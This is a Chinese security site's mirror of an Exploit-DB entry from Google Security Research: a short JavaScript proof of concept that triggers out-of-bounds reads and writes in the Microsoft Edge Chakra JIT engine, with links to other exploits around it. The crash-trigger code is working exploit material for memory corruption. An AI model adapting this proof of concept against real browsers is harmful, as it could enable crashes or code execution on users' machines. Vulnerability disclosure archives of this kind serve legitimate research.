体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法/SHDB
    • Exploits
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes

  • Exploit Database
  • 150 阅读
  • 作者: Google Security Research
    日期: 2018-07-12
  • 类别:
    • dos
    平台:
    • windows
  • 来源:https://www.exploit-db.com/exploits/45011/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    /*
    It seems that this issue is similar to theissue 1429(MSRC 42111). It might need to refresh the page several times to observe a crash.
     
    PoC:
    */
     
    let arr = new Uint32Array(1000);
    for (let i = 0; i < 0x1000000; i++) {
    for (let j = 0; j < 1; j++) {
    i--;
    i++;
    }
     
    arr[i] = 0x1234;
    }
     
上一篇: Instagram-Clone Script 2.0 – Cross-Site Scripting
下一篇: Hadoop YARN ResourceManager – Command Execution (Metasploit)
  • last Exploits
  • Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes的更多信息
  • Spidermonkey – IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script:
  • Attachmate Reflection FTP Client – Heap Overflow:
  • MW6 Technologies MaxiCode – ActiveX ‘Data’ Buffer Overflow (PoC):
  • Microsoft Office / COM Object – ‘WMALFXGFXDSP.dll’ DLL Planting (MS16-007):
  • TFTPUtil GUI 1.4.5 – Denial of Service (Metasploit):
  • Adobe Acrobat Reader DC for Windows – Heap-Based Buffer Overflow due to Malformed JP2 Stream:
  • Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC):
  • PHP – ‘openssl_x509_parse()’ Memory Corruption:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏